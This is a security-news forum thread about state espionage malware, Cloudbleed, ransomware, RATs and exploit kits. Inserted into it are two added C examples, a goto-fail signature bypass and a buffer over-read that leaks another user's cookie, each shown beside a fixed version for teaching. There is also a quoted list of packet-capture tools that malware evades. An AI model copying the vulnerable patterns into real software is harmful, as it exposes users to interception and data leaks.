Malware & other nasty IT / cyber things


AdamG
01-14-2013, 08:54 PM
Researchers at Kaspersky Lab have uncovered an "advanced cyber espionage network" - dubbed Red October - that has been active for at least five years and is targeting diplomatic and government agencies.

At the request of an unnamed partner, Kaspersky investigated and uncovered Red October (or Rocra) in October. Since at least 2007, it has targeted organizations mostly in Eastern Europe, former USSR members, and countries in Central Asia, but the malware has also showed up in Western Europe and North America.

http://www.pcmag.com/article2/0,2817,2414260,00.asp


The team at Kaspersky noted that though they’d found a set of 60 “command and control” servers throughout Germany and Russia that were responsible for these attacks, they each appeared to have been controlled by a sort of “mother ship” server which they’ve not yet located. Each of the attacks thus far appears to have been attached to Microsoft Word or Excel documents and delivered via email. When the document was downloaded and opened, a connection was made between the computer and one of the many command and control servers, which then delivered the files necessary to collect secure data.

This Rocra malware was also spread with USB drives as well as through smartphones, not just through desktop machines. Mentions of Russian words throughout the discovered malware systems have been suggested to either point towards the software as being Russian in origin or placed deliberately to make the software appear to have come from Russia when in fact it was made by a different group entirely.

http://www.slashgear.com/operation-red-october-cyberattack-detailed-by-kaspersky-lab-14265239/

AdamG
02-11-2014, 07:32 PM
Sounds ominous. Anyone know anything more that they can share?


Punta Cana, Dominican Republic – February 10, 2014 - Kaspersky Lab’s security research team today announced the discovery of “The Mask” (aka Careto), an advanced Spanish-language speaking threat actor that has been involved in global cyber-espionage operations since at least 2007. What makes The Mask special is the complexity of the toolset used by the attackers, including an extremely sophisticated malware, a rootkit, a bootkit, Mac OS X and Linux versions and possibly versions for Android and iOS (iPad/iPhone).

The primary targets are government institutions, diplomatic offices and embassies, energy, oil and gas companies, research organizations and activists. Victims of this targeted attack have been found in 31 countries around the world – from the Middle East and Europe to Africa and the Americas.
http://usa.kaspersky.com/about-us/press-center/press-releases/kaspersky-lab-uncovers-%E2%80%9C-mask%E2%80%9D-one-most-advanced-global-cyber-e

AdamG
02-16-2014, 07:37 PM
Based on the prevalence of Spanish-speaking victims, the number of infected victims in Morocco, and the fact that Gibraltar is on the list, that implies Spain is behind this one. My guess is that soon countries will start infecting uninteresting targets in order to deflect blame, but that they still think they’re immune from discovery. So Spain, if it is you, attack a few sites in the Falklands next time -- and use a separate tool for Morocco.
https://www.schneier.com/blog/archives/2014/02/the_mask_espion.html

AdamG
02-25-2014, 04:16 PM
Separate thread, considering the number of readers using iPhones.


Apple quietly released a major update Friday to fix a security glitch in its iOS 7 systems. But independent security experts say the seemingly routine update covers up what arguably could be Apple’s biggest security lapse, exposing iPhone, iPad and iPod Touch users to hackers.

The issue is an extra line of “goto” code that bypasses the iOS system’s authentication process, allowing a third party to intercept emails and Internet traffic. That means a hacker can pose as a friendly, trusted source, such as your email provider, and eavesdrop on users’ encrypted Internet traffic and potentially take full control of the system.

http://thinkprogress.org/home/2014/02/23/3321131/iphone-security-flaw/#
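The "extra line of goto code" the article describes, shown as an added example that is not Apple's code: a stand-in for the handshake signature check in which a duplicated goto skips the verification, beside the corrected form. hash_ctx, verify_signature, make_signature and the kParams bytes are constructed for the illustration; the toy hash is not a cryptographic hash.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-ins for the handshake hash and signature check, not real crypto:
 * a toy FNV-1a style hash, and a "signature" that is simply the big-endian digest. */
typedef struct { uint32_t state; } hash_ctx;

static int hash_init(hash_ctx *c) { c->state = 2166136261u; return 0; }
static int hash_update(hash_ctx *c, const uint8_t *d, size_t n) {
    for (size_t i = 0; i < n; i++) { c->state ^= d[i]; c->state *= 16777619u; }
    return 0;
}
static int hash_final(hash_ctx *c, uint32_t *out) { *out = c->state; return 0; }

/* 0 if sig matches the digest of the signed data, -1 otherwise. */
static int verify_signature(uint32_t digest, const uint8_t *sig, size_t slen) {
    if (slen != 4) return -1;
    uint32_t got = ((uint32_t)sig[0] << 24) | ((uint32_t)sig[1] << 16) |
                   ((uint32_t)sig[2] << 8)  |  (uint32_t)sig[3];
    return got == digest ? 0 : -1;
}

/* The signature an honest server would attach to params. */
void make_signature(const uint8_t *params, size_t plen, uint8_t sig[4]) {
    hash_ctx c; uint32_t d;
    hash_init(&c); hash_update(&c, params, plen); hash_final(&c, &d);
    sig[0] = (uint8_t)(d >> 24); sig[1] = (uint8_t)(d >> 16);
    sig[2] = (uint8_t)(d >> 8);  sig[3] = (uint8_t)d;
}

/* VULNERABLE: the second "goto fail;" is not governed by the if above it, so it always
 * executes. err still holds the 0 returned by the successful hash_update, so the
 * function reports success and verify_signature is never reached: any signature,
 * including an empty one, passes. */
int verify_server_key_exchange_vulnerable(const uint8_t *params, size_t plen,
                                          const uint8_t *sig, size_t slen) {
    hash_ctx ctx; uint32_t digest = 0; int err;
    if ((err = hash_init(&ctx)) != 0)
        goto fail;
    if ((err = hash_update(&ctx, params, plen)) != 0)
        goto fail;
        goto fail;                            /* the extra line */
    if ((err = hash_final(&ctx, &digest)) != 0)
        goto fail;
    if ((err = verify_signature(digest, sig, slen)) != 0)
        goto fail;
fail:
    return err;
}

/* FIXED: identical flow with the stray line removed; the signature check now runs. */
int verify_server_key_exchange_fixed(const uint8_t *params, size_t plen,
                                     const uint8_t *sig, size_t slen) {
    hash_ctx ctx; uint32_t digest = 0; int err;
    if ((err = hash_init(&ctx)) != 0)
        goto fail;
    if ((err = hash_update(&ctx, params, plen)) != 0)
        goto fail;
    if ((err = hash_final(&ctx, &digest)) != 0)
        goto fail;
    if ((err = verify_signature(digest, sig, slen)) != 0)
        goto fail;
fail:
    return err;
}

/* Constructed ServerKeyExchange body used by the demo and tests. */
static const uint8_t kParams[] = {0x03, 0x00, 0x17, 0x41, 0x04, 0xde, 0xad, 0xbe, 0xef};

/* Result of the chosen verifier for a genuine signature (0 from both). */
int check_genuine(int use_fixed) {
    uint8_t sig[4];
    make_signature(kParams, sizeof kParams, sig);
    return use_fixed ? verify_server_key_exchange_fixed(kParams, sizeof kParams, sig, 4)
                     : verify_server_key_exchange_vulnerable(kParams, sizeof kParams, sig, 4);
}

/* Result for a forged signature (a genuine one with a byte flipped): the vulnerable
 * verifier returns 0, the fixed one -1. */
int check_forged(int use_fixed) {
    uint8_t sig[4];
    make_signature(kParams, sizeof kParams, sig);
    sig[0] ^= 0xff;
    return use_fixed ? verify_server_key_exchange_fixed(kParams, sizeof kParams, sig, 4)
                     : verify_server_key_exchange_vulnerable(kParams, sizeof kParams, sig, 4);
}

int main(void) {
    printf("genuine: vulnerable=%d fixed=%d\n", check_genuine(0), check_genuine(1));
    printf("forged:  vulnerable=%d fixed=%d\n", check_forged(0), check_forged(1));
    return 0;
}
```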

AdamG
08-09-2016, 01:18 PM
Security experts have discovered a malware platform that's so advanced in its design and execution that it could probably have been developed only with the active support of a nation-state.

The malware—known alternatively as "ProjectSauron" by researchers from Kaspersky Lab and "Remsec" by their counterparts from Symantec—has been active since at least 2011 and has been discovered on 30 or so targets. Its ability to operate undetected for five years is a testament to its creators, who clearly studied other state-sponsored hacking groups in an attempt to replicate their advances and avoid their mistakes. State-sponsored groups have been responsible for malware like the Stuxnet- or National Security Agency-linked Flame, Duqu, and Regin. Much of ProjectSauron resides solely in computer memory and was written in the form of Binary Large Objects, making it hard to detect using antivirus.

http://arstechnica.com/security/2016/08/researchers-crack-open-unusually-advanced-malware-that-hid-for-5-years/

AdamG
08-26-2016, 03:19 PM
Government Hackers Caught Using Unprecedented iPhone Spy Tool


It appears that the company that provided the spyware and the zero-day exploits to the hackers targeting Mansoor is a little-known Israeli surveillance vendor called NSO Group, which Lookout’s vice president of research Mike Murray labeled as “basically a cyber arms dealer.”
http://motherboard.vice.com/read/government-hackers-iphone-hacking-jailbreak-nso-group

AdamG
08-26-2016, 03:21 PM
Hackers claim to have stolen attack code from a team of sophisticated cyber spies known as “the Equation Group,” widely believed to be associated with the U.S. National Security Agency, one of the world’s top intelligence outfits. The hackers have offered to sell their purloined exploits to the highest bidder in an online auction conducted in the cryptocurrency Bitcoin.

Although the alleged breach could just be an extravagant hoax, experts who reviewed a preliminary data dump teased alongside the hackers’ garbled sales pitch said that the files, amazingly, looked authentic. “This appears to be legitimate code,” Matt Suiche, a French cybersecurity entrepreneur, wrote in a Medium blog post, echoing what others had posted on Twitter ( TWTR -0.11% ) .

http://fortune.com/2016/08/16/nsa-hack-auction-shadow-brokers-cyber-weapons/

OUTLAW 09
02-24-2017, 08:36 AM
Warning for SWJ commenters and bloggers and/or blogsites....

List of Sites possibly affected by Cloudflare's #Cloudbleed HTTPS Traffic Leak

https://github.com/pirate/sites-using-cloudflare/blob/master/README.md


DISCLAIMER:
This list contains all domains that use cloudflare DNS, not just the cloudflare SSL proxy (the affected service that leaked data). It's a broad sweeping list that includes everything. Just because a domain is on the list does not mean the site is compromised. This list will be narrowed down to the affected domains as I get more information. This is a (work-in-progress) list of domains possibly affected by the CloudBleed HTTPS traffic leak. Original vuln thread by Google Project Zero.
Cloudflare has not provided an official list of affected domains, and likely will not due to privacy concerns. I'm compiling an unofficial list here so you know what passwords to change.
Impact
Between 2016-09-22 - 2017-02-18 passwords, private messages, API keys, and other sensitive data were leaked by Cloudflare to random requesters. Data was cached by search engines, and may have been collected by random adversaries over the past few months.
"The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests), potential of 100k-200k pages with private data leaked every day" -- source
You can see some of the leaked data yourself in search engine caches: https://duckduckgo.com/?q=+%7B%22scheme%22%3A%22http%22%7D+CF-Host-Origin-IP&t=h_&ia=web
What should I do?
Check your password managers and change all your passwords, especially those on these affected sites. Rotate API keys & secrets, and confirm you have 2-FA set up for important accounts. Theoretically sites not in this list can also be affected (because an affected site could have made an API request to a non-affected one), so to be safe you should probably change all your important passwords.
Submit PRs to add domains that you know are using cloudflare
Methodology
This list was compiled from 3 large dumps of all cloudflare customers provided by crimeflare.com/cfs.html, and several manually copy-pasted lists from stackshare.io and wappalyzer.com. Crimeflare collected their lists by doing NS DNS lookups on a large number of domains, and checking SSL certificate ownership.
I scraped the Alexa top 10,000 by using a simple loop over the list:
    # fish shell syntax: for each domain, query its NS records and keep it
    # if a Cloudflare nameserver appears in the answer
    for domain in (cat ~/Desktop/alexa_10000.csv)
        if dig $domain NS | grep cloudflare
            echo $domain >> affected.txt
        end
    end
The alexa scrape, and the crimeflare dumps were then combined in a single text file, and passed through uniq | sort. I've since accepted several PRs and issues to remove sites that were unaffected from the list.
Data sources:
https://stackshare.io/cloudflare
https://wappalyzer.com/applications/cloudflare
DNS scraper I'm running on Alexa top 10,000 sites (grepping for cloudflare in results)
https://www.cloudflare.com/ips/ (going to find sites that resolve to these IPs next)
http://www.crimeflare.com/cfs.html (scrape of all cloudflare customers)
http://www.doesitusecloudflare.com/
I'd rather be safe than sorry so I've included any domain here that remotely touches cloudflare. If I've made a mistake and you believe your site is not affected, submit a PR and I will merge it ASAP, I don't want to hurt anyone's reputation unnecessarily.
You can also ping me on twitter @theSquashSH and I'll respond as soon as I can.
Full List
Download the full list.zip (22mb)
4,287,625 possibly affected domains. Download this file, unzip it, then run grep -x domaintocheck.com sorted_unique_cf.txt to see if a domain is present.
Also, a list of some iOS apps that may have been affected.

For those late to it, yes, you probably should change your passwords on sites that use CloudFlare as a precaution
https://bugs.chromium.org/p/project-zero/issues/detail?id=1139#

To be clear, this isn't some nation state level attack: data is cached in search engines right now

davidbfpo
02-24-2017, 09:22 AM
A new thread for temporary maximum visibility and explained in the main post that will appear first in a moment. Thanks to Outlaw09 spotting the circulation.

OUTLAW 09
02-28-2017, 03:15 PM
CloudBleed: check if you visited sites affected by CloudFlare’s security issue

By Martin Brinkmann on February 26, 2017 in Security - Last Update: February 26, 2017

CloudBleed is the unofficial name for a security issue discovered on February 17th, 2017 that affected CloudFlare's reverse proxies.
CloudFlare is a large provider that is used by more than 5.5 million Internet properties according to the company's website. It offers CDN and DDOS protection, optimization technologies for websites, dedicated SSL and a lot more.
The basic service is offered for free, but webmasters and organizations may upgrade to a paid plan for additional features and better protection.
The security issue at hand caused the servers to "run past the end of a buffer" which returned memory that contained private information. Among other things, it might have included HTTP cookies, authentication tokens, HTTP Post bodies, and other sensitive data.
The issue was disclosed by Google's Project Zero, and has since been fixed by CloudFlare.
Cloudbleed

The main issue for Internet users is that their authentication cookies or data may have leaked. Search engines may have cached the data, and attackers may have exploited the issue as well to gather the data.
Since there is no record whether individual user data was leaked or not, some experts suggest that users change passwords on all sites and services that use CloudFlare. This is a difficult thing for most users however, as it is quite time consuming to find out whether services and sites use CloudFlare.
The Firefox add-on and Chrome Extension CloudBleed changes that. Designed by the NoSquint Plus author, it is parsing the browsing history of the browser to reveal any site or service that uses CloudFlare.
This enables you to go quickly through the listing to identify sites that you have an account on.
The extensions work identically in both browsers. Simply install it in your browser of choice, and click on the icon that it adds to the main toolbar of the browser.
The page that loads includes a short explanation, and a search button that you need to click on. The extension goes through the browsing history then, and checks whether sites in the history were affected by the issue.
Some sites may appear multiple times in the listing. An option to filter sites by domain, or subdomain, would have been useful.
The author notes that all processing is done on the local system. All that is left afterwards is to go through the list to identify the sites with accounts.
Closing Words
CloudBleed is a handy browser extension for Google Chrome and Firefox. You may use it to reveal sites affected by CloudFlare's recent security issue quickly, provided that you did not delete the browsing history in the meantime.
Now You: Have you changed account passwords of affected sites?
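The leak described in the README above and in this article (a parser that "ran past the end of a buffer" and returned memory belonging to other requests) in miniature, as an added example that is not Cloudflare's parser or code from the page: a toy href extractor whose end-of-buffer test uses == and whose escape handling steps past the end, beside a bounded version. The arena layout, the PAGE and NEIGHBOR contents and all function names are constructed for the illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Find the first href="..." in buf[0..len); return a pointer to the value or NULL. */
static const char *find_href_value(const char *buf, size_t len) {
    static const char key[] = "href=\"";
    const size_t klen = sizeof key - 1;
    for (size_t i = 0; i + klen <= len; i++)
        if (memcmp(buf + i, key, klen) == 0)
            return buf + i + klen;
    return NULL;
}

/* Copy the href value into out (NUL-terminated, at most out_cap-1 bytes); a backslash
 * escapes the byte after it. Returns the value length, or -1 if no closing quote.
 * VULNERABLE: the end test uses == and the escape path steps p forward by two without
 * checking that a second byte exists. A buffer ending in a backslash pushes p past end,
 * the == test never fires again, and the copy keeps reading whatever memory follows. */
long extract_href_vulnerable(const char *buf, size_t len, char *out, size_t out_cap) {
    const char *p = find_href_value(buf, len), *end = buf + len;
    size_t n = 0;
    if (p == NULL || out_cap == 0) return -1;
    for (;;) {
        if (p == end) return -1;                       /* BUG: must be >= */
        if (*p == '"') break;
        if (n + 1 >= out_cap) break;                   /* out is full: stop copying */
        if (*p == '\\') { out[n++] = p[1]; p += 2; }   /* BUG: p[1] may lie past end */
        else            { out[n++] = *p;   p += 1; }
    }
    out[n] = '\0';
    return (long)n;
}

/* FIXED: a >= end test, and the escape path refuses to run with fewer than two bytes left. */
long extract_href_fixed(const char *buf, size_t len, char *out, size_t out_cap) {
    const char *p = find_href_value(buf, len), *end = buf + len;
    size_t n = 0;
    if (p == NULL || out_cap == 0) return -1;
    for (;;) {
        if (p >= end) return -1;
        if (*p == '"') break;
        if (n + 1 >= out_cap) break;
        if (*p == '\\') {
            if (end - p < 2) return -1;                /* truncated escape: refuse */
            out[n++] = p[1]; p += 2;
        } else {
            out[n++] = *p; p += 1;
        }
    }
    out[n] = '\0';
    return (long)n;
}

/* Constructed memory layout: the page being rewritten (request A) ends in a backslash
 * and is immediately followed, in the same arena, by another client's request (B).
 * Keeping both in one array makes the over-read deterministic for the demo instead of
 * undefined behaviour on real heap memory. */
#define PAGE     "<a href=\"/login?next=\\"
#define NEIGHBOR "GET /account HTTP/1.1\r\nCookie: session=SECRET-OF-OTHER-USER\"\r\n"
static const char arena[] = PAGE NEIGHBOR;
#define PAGE_LEN (sizeof PAGE - 1)

/* 1 if the extractor returned text containing request B's cookie, 0 if it did not,
 * -1 if it refused the truncated input. */
int demo_exposes_secret(int use_fixed) {
    char out[128];
    long n = use_fixed ? extract_href_fixed(arena, PAGE_LEN, out, sizeof out)
                       : extract_href_vulnerable(arena, PAGE_LEN, out, sizeof out);
    if (n < 0) return -1;
    return strstr(out, "SECRET-OF-OTHER-USER") != NULL;
}

/* Both extractors agree on a well-formed page: returns the extracted length. */
long demo_wellformed(int use_fixed) {
    static const char page[] = "<p><a href=\"/home\">x</a>";
    char out[32];
    return use_fixed ? extract_href_fixed(page, sizeof page - 1, out, sizeof out)
                     : extract_href_vulnerable(page, sizeof page - 1, out, sizeof out);
}

int main(void) {
    char out[128];
    long n = extract_href_vulnerable(arena, PAGE_LEN, out, sizeof out);
    printf("vulnerable: %ld bytes: %s\n", n, n < 0 ? "(refused)" : out);
    n = extract_href_fixed(arena, PAGE_LEN, out, sizeof out);
    printf("fixed: %ld (%s)\n", n, n < 0 ? "refused truncated value" : out);
    return 0;
}
```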

OUTLAW 09
04-17-2017, 04:38 PM
Moderator's Note

A number of posts have appeared recently in another thread, which advertise malware and other nasty IT things and they deserve their own thread. So I will move eight readily id'd posts that are not Russian focused here, all of them by Outlaw09 who works in the cyber arena. It may help to watch the Russian Cyber & Disinformation thread for background and other matters: Russian Info, Cyber and Disinformation (Catch all 2017 onwards). (http://council.smallwarsjournal.com/Russian Info, Cyber and Disinformation (Catch all 2017 onwards).)
(Mod Ends)

ALERT....I had posted this previously but am doing it again as it is spreading fast now world wide

Philadelphia Ransomware, a new threat targets the Healthcare Industry

Security experts from Forcepoint have discovered a new strain of ransomware dubbed Philadelphia that is targeting organizations in the healthcare industry.

The Philadelphia ransomware is a variant of the Stampado ransomware, a very cheap malware offered for sale on the Dark Web since June 2016 at just 39 USD for a lifetime license.

Last month the popular expert Brian Krebs discovered on YouTube an ad for Philadelphia.


According to the researchers, the Philadelphia ransomware is distributed via spear-phishing emails sent to the hospitals. The messages contain a shortened URL that points to a personal storage site that serves a weaponized DOCX file containing the targeted healthcare organization’s logo.

The file includes three document icons apparently related to patient information, and attempts to trick victims into clicking on them.

Philadelphia ransomware

If the victims click on the icon, a JavaScript is triggered which downloads and executes a variant of the Philadelphia ransomware.

This tactic was already used to infect a hospital from Oregon and Southwest Washington.

“However, it appears that amateur cybercriminals have also started to shift towards this trend in the form of an off-the-shelf ransomware aimed at a healthcare organization in the United States.” reads the analysis published by ForcePoint.

“In this attack, a shortened URL, which we believe was sent through a spear-phishing email, was used as a lure to infect a hospital from Oregon and Southwest Washington. Once a user clicks on the link, the site redirects to a personal storage site to download a malicious DOCX file. This document contains the targeted healthcare organization’s logo and a signature of a medical practitioner from that organization as bait.”

Once the ransomware has infected the system, it contacts the C&C server and sends various details about the target machine, including operating system, username, country, and system language. The C&C server responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

The Philadelphia ransomware uses AES-256 to encrypt the files; when the operation is complete it displays a request for a 0.3 Bitcoin ransom to the victims.

The analysis of the malicious code revealed a couple of interesting things:
• the encrypted JavaScript contained a string “hospitalspam” in its directory path.
• the ransomware C&C also contained “hospital/spam” in its path.

The presence of the words suggests the attackers are specifically targeting hospitals using spear phishing emails.

“Ransomware-as-a-service (RaaS) platforms such as Philadelphia continue to attract would-be cybercriminals to take part in the ransomware business” concluded Forcepoint. “Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,”

OUTLAW 09
04-17-2017, 04:46 PM
The Russian group Turla has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.

The Russian APT group known as Turla (also known as Waterbug, KRYPTON and Venomous Bear) has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.

Carbon is a second-stage backdoor used after the initial reconnaissance phase of an attack, which involves malware such as Tavdig.

Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.

The last time the researchers reported on Turla‘s activities was February 2017, when experts at Kaspersky Lab discovered a new piece of JavaScript malware linked to the group targeting organizations in Greece, Qatar, and Romania.

Turla has been active since at least 2007; the hackers have launched several high-profile attacks against targets worldwide, including those aimed at the Swiss defense firm RUAG and the U.S. Central Command.

Carbon, aka Pfinet, is one of the tools in the arsenal of the hacking crew; researchers from ESET described it as a lite version of Uroburos.

Carbon is a second-stage backdoor that is typically deployed after the reconnaissance phase of an attack. It has several components, including a dropper, a command and control (C&C) communications element, an orchestrator, and a loader that executes the orchestrator.

The orchestrator is used to inject the C&C communications library into a legitimate process, and dispatch the tasks received via the C&C library to other bots that are located on the network.

Turla

ESET has identified several versions of Carbon compiled last year; the most recent one was compiled on October 21, 2016. The newer versions of the Carbon malware make massive use of encryption.

Almost every component is a DLL file, except for the loader, which is an EXE file.

“The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.” reads the analysis shared by ESET.

“After a successful attack, a first stage backdoor — such as Tavdig or Skipper — is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.”

The threat actors behind Turla have modified their tools every time they were detected in the wild. Researchers observed that in the case of Carbon, the hackers changed file names and mutexes in version 3.8, released in the summer of 2016.

Experts noticed that before the malware starts communicating with the C&C, it checks the infected system for the presence of packet capture software, such as Wireshark and Tcpdump.


“Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

• TCPdump.exe
• windump.exe
• ethereal.exe
• wireshark.exe
• ettercap.exe
• snoop.exe
• dsniff.exe”

OUTLAW 09
04-17-2017, 04:48 PM
Over 20 million Gmail and 5 million Yahoo accounts available for sale on the Dark Web




A vendor with the online moniker “SunTzu583” is reportedly selling millions of login credentials for Gmail and Yahoo accounts on a black market on the dark web. Over 20 million Gmail accounts and 5 million Yahoo accounts are available for sale; the huge trove of data is the result of previous massive data breaches.

SunTzu583 is known to security experts; he specialized in the sale of stolen login credentials.

A couple of weeks ago the colleagues at HackRead reported the sale of more than 1 million Gmail and Yahoo accounts by the same seller and a few days later, SunTzu583 started selling PlayStation accounts.

Dark web Playstation accounts

SunTzu583 offered 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC), the dump includes emails and clear-text passwords.

SunTzu583 confirmed that the archive was not directly stolen from PlayStation network, but it does contain unique accounts of PlayStation users. The seller added that even if the accounts may work for other web services they are first of all PlayStation accounts.

Back to the present, the seller SunTzu583 is offering in separate listings millions of Gmail accounts.

In three different listings, he is offering 4,928,888 accounts.

“The total number of Gmail accounts being sold are 4,928,888 which have been divided into three different listings. All three listings contain 2,262,444 accounts including emails and their clear text passwords.” reports the analysis published by HackRead. “In the description of these listings, SunTzu583 has mentioned that “Not all these combinations work directly on Gmail, so don’t expect that all these email and passwords combinations work on Gmail.””

The researchers at HackRead who have compared the listings with Hacked-DB and Have I been pwned repositories confirmed that the sources of the data are past data breaches including LinkedIn (117 million accounts), Adobe (153 million accounts) and Bitcoin Security Forum (5 million Gmail passwords).

OUTLAW 09
04-17-2017, 04:52 PM
Experts from security firm Sixgill have discovered a new strain of the macOS Proton RAT that is offered for sale on the Russian cybercrime underground.

The Dark Web is the right place to find any kind of illegal product and service; malware such as banking trojans and spyware is very popular in the cybercriminal underground.

Recently a new remote access tool (RAT) specifically designed to infect macOS systems has been advertised on the Russian cybercrime underground. The researchers at security firm Sixgill discovered the advertisement on crime forums and on a custom website; this threat is also described in videos published on YouTube.

https://youtu.be/JA7sfDc9Ad0

The Proton homepage went down just after the experts at Sixgill published the report.

“Sixgill researchers have encountered a post in one of the leading, closed Russian cybercrime message boards. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. The author offered this product in one of the leading underground cybercrime markets.” reads a report published by Sixgill.

The Proton RAT first appeared in the threat landscape last year; the variant recently advertised on hacking forums includes many features such as the ability to execute console commands, access the user’s webcam, log keystrokes, capture screenshots and open SSH/VNC remote connections. The malicious code is also able to inject malicious code in the user’s browser to display popups asking victims for information such as credit card numbers, login credentials, and others.

“The malware includes root-access privileges and features allowing an attacker to obtain full control of the victim’s computer. Its capabilities include: running real-time console commands and file-manager, keylogging, SSH/VNC connectivity, screenshots, webcam operation and the ability to present a custom native window requesting information such as a credit-card, driver’s license and more. The malware also boasts the capability of iCloud access, even when two-factor authentication is enabled.” continues the report.

According to the author, macOS Proton RAT is written in native Objective-C and it is fully undetected by any existing MAC OS antivirus solution.

Below the list of features described in the ad:

macOS Proton RAT

The Proton RAT has root access and is able to elude standard macOS security features, it is also able to bypass two-factor authentication on iCloud accounts.

Researchers speculate that the macOS Proton RAT leverages a zero-day vulnerability in macOS, but the most interesting characteristic of the threat is that the malicious code is signed with genuine Apple code-signing certificates. It is likely the author has managed to falsify registration to the Apple Developer ID Program or has stolen the credentials of an Apple developer.

“The real threat behind the software is this: The malware is shipped with genuine Apple code-signing signatures. This means the author of Proton RAT somehow got through the rigorous filtration process Apple places on MAC OS developers of third-party software, and obtained genuine certifications for his program. Sixgill evaluates that the malware developer has managed to falsify registration to the Apple Developer ID Program or used stolen developer credentials for the purpose.” reads the report.

The price for the macOS Proton RAT ranged from $1,200 to $830,000 for the entire project (an absurd price). Below the version advertised on the Proton websites:

Standard Edition

I) License to control only ONE remote machine
   1) 1 BTC — unsigned
   2) 2 BTC — signed
II) License to control 20 remote machines
   1) 10 BTC — unsigned
   2) 11 BTC — signed
III) License to control infinite remote machines
   1) 66 BTC — unsigned
   2) 76 BTC — signed

Extended edition

I) License to control infinite remote machines
   1) 166 BTC — unsigned
   2) 200 BTC — signed
II) License to control infinite remote machines on your own server
   1) 366 BTC — without source code
   2) 666 BTC — with full source code

Researchers noticed that the authors of the malware try to disguise their spyware as legitimate surveillance software.

OUTLAW 09
04-17-2017, 04:54 PM

One year ago the Angler EK and Nuclear EK disappeared from the threat landscape, while the Sundown EK was conquering the criminal underground.

What’s happening now?

The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.

Last week, Cisco Talos published an analysis of Sundown EK; the experts detailed the improvements of the EK, which presented many similarities with the RIG exploit kit.

“Sundown is an exploit kit in transition, it has stopped using calling cards and other easy ways to identify its activity. It is one of the few exploit kits adding any new exploits to their arsenal, albeit stolen. At the same time they consistently steal exploits and technologies from other people and competitors.” reads the analysis of the Talos group. “The exploit kit landscape has been struggling to find its footing since the major players have left. It still appears to be in transition with RIG and Sundown being the primary players left as an option for those looking to compromise random victims while browsing the web.”

The Sundown EK was not as sophisticated as other large exploit kits.

Security experts at Talos had noticed a long period of inactivity of the Sundown EK; variants of the kit had also disappeared from the scene, including Bizarro and Greenflash.

This silence led the experts to believe that the threat actor had ceased operations.

“Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).” reads a blog post published by MalwareBytes.

“Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.”

Recently experts observed a significant increase of hacking campaigns leveraging the Terror EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by leveraging Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a newer campaign using a different landing page that distributes the Andromeda malware.

The compromised websites are leveraged to redirect to the exploit kit landing page via a server-side 302 redirect, done via script injection.

Terror EK

“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.

OUTLAW 09
04-17-2017, 05:25 PM
Lawyers, malware, and money: The antivirus market’s nasty fight over Cylance

On the front lines of the antivirus industry's "testing wars."
Sean Gallagher - 4/17/2017, 1:00 PM

https://arstechnica.com/information-technology/2017/04/the-mystery-of-the-malware-that-wasnt/

OUTLAW 09
04-22-2017, 08:22 AM
Last posting that I find critical as I and my company have moved into this research area over the last year and it is massive...especially on the botnet side of the Deep Net.....AND how those botnets are being tied into the Russian hacking and information war with the West....if these botnets are not pushing info war messaging...then they are into spamming...phishing and DDoS attacks.....and then back to info warfare messaging....depending on need and end user taskings....

Security firm Flashpoint published an interesting paper titled, "Cybercrime Economy: An Analysis of Cybercriminal Communication Strategies" about cybercriminal communications of threat actors.


A recent research by the threat intelligence firm Flashpoint has uncovered how malicious threat actors communicate to share information between them.
The research found that there is a growing economy in cybercriminal communications; more than just information sharing, it has formed an ecosystem in which failures, successes, planning and procedures to beat organizations' countermeasures are shared, as well as the planning of attacks.
The research points out that cybercriminal communications use a variety of software alongside access to communities in the deep and dark web. This is done in order to carry out cross-domain organization for committing crimes like phishing, credit card fraud, spam, and every sort of attack that passes through corporations' filters and defenses.

The reason for using this software to communicate is to make it difficult for law enforcement agencies to track the activities in the community's forums, as well as to give privacy to the user, since most of these programs have cryptographic functions or protocols operating at their core. The software also allows a user to enter random, arbitrary or even fraudulent information about themselves, which makes it more difficult to determine who the user is.
On the other hand, another reason for doing so is the payment required to maintain a forum, which in many cases can represent a difficulty for cybercriminals. The use of communications programs is free of charge and anyone can download them.
